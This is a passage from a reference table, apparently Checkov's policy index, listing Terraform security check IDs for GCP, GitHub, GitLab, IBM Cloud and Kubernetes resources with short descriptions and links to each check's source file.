GKE Don't Use NodePools in the Cluster configuration | Terraform | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py) | -| 1744 | CKV2_GCP_1 | resource | google_project_default_service_accounts | Ensure GKE clusters are not running using the Compute Engine default service account | Terraform | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml) | -| 1745 | CKV2_GCP_2 | resource | google_compute_network | Ensure legacy networks do not exist for a project | Terraform | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml) | -| 1746 | CKV2_GCP_3 | resource | google_service_account_key | Ensure that there are only GCP-managed service account keys for each service account | Terraform | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml) | -| 1747 | CKV2_GCP_4 | resource | google_logging_folder_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 1748 | CKV2_GCP_4 | resource | google_logging_organization_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 1749 | CKV2_GCP_4 | resource | google_logging_project_sink | Ensure that retention policies on log buckets are configured using Bucket 
Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 1750 | CKV2_GCP_4 | resource | google_storage_bucket | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 1751 | CKV2_GCP_5 | resource | google_project | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | -| 1752 | CKV2_GCP_5 | resource | google_project_iam_audit_config | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | -| 1753 | CKV2_GCP_6 | resource | google_kms_crypto_key | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 1754 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_binding | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 1755 | CKV2_GCP_6 | resource | 
google_kms_crypto_key_iam_member | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 1756 | CKV2_GCP_7 | resource | google_sql_database_instance | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | -| 1757 | CKV2_GCP_7 | resource | google_sql_user | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | -| 1758 | CKV2_GCP_8 | resource | google_kms_key_ring | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 1759 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_binding | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 1760 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_member | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | 
[GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 1761 | CKV2_GCP_9 | resource | google_container_registry | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 1762 | CKV2_GCP_9 | resource | google_storage_bucket_iam_binding | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 1763 | CKV2_GCP_9 | resource | google_storage_bucket_iam_member | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 1764 | CKV2_GCP_10 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function HTTP trigger is secured | Terraform | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml) | -| 1765 | CKV2_GCP_11 | resource | google_project_services | Ensure GCP GCR Container Vulnerability Scanning is enabled | Terraform | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml) | -| 1766 | CKV2_GCP_12 | resource | google_compute_firewall | 
Ensure GCP compute firewall ingress does not allow unrestricted access to all ports | Terraform | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml) | -| 1767 | CKV2_GCP_13 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_duration' is set to 'on' | Terraform | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml) | -| 1768 | CKV2_GCP_14 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml) | -| 1769 | CKV2_GCP_15 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml) | -| 1770 | CKV2_GCP_16 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml) | -| 1771 | CKV2_GCP_17 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off' | Terraform | 
[GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml) | -| 1772 | CKV2_GCP_18 | resource | google_compute_network | Ensure GCP network defines a firewall and does not use the default firewall | Terraform | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml) | -| 1773 | CKV2_GCP_19 | resource | google_container_cluster | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled | Terraform | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml) | -| 1774 | CKV2_GCP_20 | resource | google_sql_database_instance | Ensure MySQL DB instance has point-in-time recovery backup configured | Terraform | [GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml) | -| 1775 | CKV2_GCP_21 | resource | google_notebooks_instance | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml) | -| 1776 | CKV2_GCP_22 | resource | google_document_ai_processor | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml) | -| 1777 | CKV2_GCP_23 | resource | 
google_document_ai_warehouse_location | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml) |
-| 1778 | CKV2_GCP_24 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml) |
-| 1779 | CKV2_GCP_25 | resource | google_vertex_ai_featurestore | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml) |
-| 1780 | CKV2_GCP_26 | resource | google_vertex_ai_tensorboard | Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml) |
-| 1781 | CKV2_GCP_27 | resource | google_workbench_instance | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml) |
-| 1782 | CKV2_GCP_28 | resource | google_workbench_instance | Ensure Vertex AI workbench instances are private | Terraform | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml) |
-| 1783 | CKV2_GCP_29 | resource | google_dialogflow_agent | Ensure logging is enabled for Dialogflow agents | Terraform | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml) |
-| 1784 | CKV2_GCP_30 | resource | google_dialogflow_cx_agent | Ensure logging is enabled for Dialogflow CX agents | Terraform | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml) |
-| 1785 | CKV2_GCP_31 | resource | google_dialogflow_cx_webhook | Ensure logging is enabled for Dialogflow CX webhooks | Terraform | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml) |
-| 1786 | CKV2_GCP_32 | resource | google_tpu_v2_vm | Ensure TPU v2 is private | Terraform | [GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml) |
-| 1787 | CKV2_GCP_33 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint is private | Terraform | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml) |
-| 1788 | CKV2_GCP_34 | resource | google_vertex_ai_index_endpoint | Ensure Vertex AI index endpoint is private | Terraform | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml) |
-| 1789 | CKV2_GCP_35 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml) |
-| 1790 | CKV2_GCP_36 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is private | Terraform | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml) |
-| 1791 | CKV_GIT_1 | resource | github_repository | Ensure GitHub repository is Private | Terraform | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py) |
-| 1792 | CKV_GIT_2 | resource | github_repository_webhook | Ensure GitHub repository webhooks are using HTTPS | Terraform | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py) |
-| 1793 | CKV_GIT_3 | resource | github_repository | Ensure GitHub repository has vulnerability alerts enabled | Terraform | [RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py) |
-| 1794 | CKV_GIT_4 | resource | github_actions_environment_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
-| 1795 | CKV_GIT_4 | resource | github_actions_organization_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
-| 1796 | CKV_GIT_4 | resource | github_actions_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
-| 1797 | CKV_GIT_5 | resource | github_branch_protection | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) |
-| 1798 | CKV_GIT_5 | resource | github_branch_protection_v3 | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) |
-| 1799 | CKV_GIT_6 | resource | github_branch_protection | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) |
-| 1800 | CKV_GIT_6 | resource | github_branch_protection_v3 | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) |
-| 1801 | CKV2_GIT_1 | resource | github_repository | Ensure each Repository has branch protection associated | Terraform | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml) |
-| 1802 | CKV_GLB_1 | resource | gitlab_project | Ensure at least two approving reviews are required to merge a GitLab MR | Terraform | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py) |
-| 1803 | CKV_GLB_2 | resource | gitlab_branch_protection | Ensure GitLab branch protection rules does not allow force pushes | Terraform | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py) |
-| 1804 | CKV_GLB_3 | resource | gitlab_project | Ensure GitLab prevent secrets is enabled | Terraform | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py) |
-| 1805 | CKV_GLB_4 | resource | gitlab_project | Ensure GitLab commits are signed | Terraform | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py) |
-| 1806 | CKV2_IBM_1 | resource | ibm_is_lb | Ensure load balancer for VPC is private (disable public access) | Terraform | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml) |
-| 1807 | CKV2_IBM_2 | resource | ibm_is_vpc | Ensure VPC classic access is disabled | Terraform | [IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml) |
-| 1808 | CKV2_IBM_3 | resource | ibm_iam_account_settings | Ensure API key creation is restricted in account settings | Terraform | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml) |
-| 1809 | CKV2_IBM_4 | resource | ibm_iam_account_settings | Ensure Multi-Factor Authentication (MFA) is enabled at the account level | Terraform | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml) |
-| 1810 | CKV2_IBM_5 | resource | ibm_iam_account_settings | Ensure Service ID creation is restricted in account settings | Terraform | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml) |
-| 1811 | CKV2_IBM_6 | resource | ibm_database | Ensure Databases network access is restricted to a specific IP range | Terraform | [IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml) |
-| 1812 | CKV2_IBM_7 | resource | ibm_container_cluster | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint | Terraform | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml) |
-| 1813 | CKV_K8S_1 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py) |
-| 1814 | CKV_K8S_2 | resource | kubernetes_pod_security_policy | Do not admit privileged containers | Terraform | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py) |
-| 1815 | CKV_K8S_3 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py) |
-| 1816 | CKV_K8S_4 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py) |
-| 1817 | CKV_K8S_5 | resource | kubernetes_pod_security_policy | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py) |
-| 1818 | CKV_K8S_6 | resource | kubernetes_pod_security_policy | Do not admit root containers | Terraform | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py) |
-| 1819 | CKV_K8S_7 | resource | kubernetes_pod_security_policy | Do not admit containers with the NET_RAW capability | Terraform | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py) |
-| 1820 | CKV_K8S_8 | resource | kubernetes_deployment | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) |
-| 1821 | CKV_K8S_8 | resource | kubernetes_deployment_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) |
-| 1822 | CKV_K8S_8 | resource | kubernetes_pod | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) |
-| 1823 | CKV_K8S_8 | resource | kubernetes_pod_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) |
-| 1824 | CKV_K8S_9 | resource | kubernetes_deployment | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) |
-| 1825 | CKV_K8S_9 | resource | kubernetes_deployment_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) |
-| 1826 | CKV_K8S_9 | resource | kubernetes_pod | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) |
-| 1827 | CKV_K8S_9 | resource | kubernetes_pod_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) |
-| 1828 | CKV_K8S_10 | resource | kubernetes_deployment | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) |
-| 1829 | CKV_K8S_10 | resource | kubernetes_deployment_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) |
-| 1830 | CKV_K8S_10 | resource | kubernetes_pod | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) |
-| 1831 | CKV_K8S_10 | resource | kubernetes_pod_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) |
-| 1832 | CKV_K8S_11 | resource | kubernetes_deployment | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) |
-| 1833 | CKV_K8S_11 | resource | kubernetes_deployment_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) |
-| 1834 | CKV_K8S_11 | resource | kubernetes_pod | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) |
-| 1835 | CKV_K8S_11 | resource | kubernetes_pod_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) |
-| 1836 | CKV_K8S_12 | resource | kubernetes_deployment | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) |
-| 1837 | CKV_K8S_12 | resource | kubernetes_deployment_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) |
-| 1838 | CKV_K8S_12 | resource | kubernetes_pod | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) |
-| 1839 | CKV_K8S_12 | resource | kubernetes_pod_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) |
-| 1840 | CKV_K8S_13 | resource | kubernetes_deployment | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) |
-| 1841 | CKV_K8S_13 | resource | kubernetes_deployment_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) |
-| 1842 | CKV_K8S_13 | resource | kubernetes_pod | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) |
-| 1843 | CKV_K8S_13 | resource | kubernetes_pod_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) |
-| 1844 | CKV_K8S_14 | resource | kubernetes_deployment | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) |
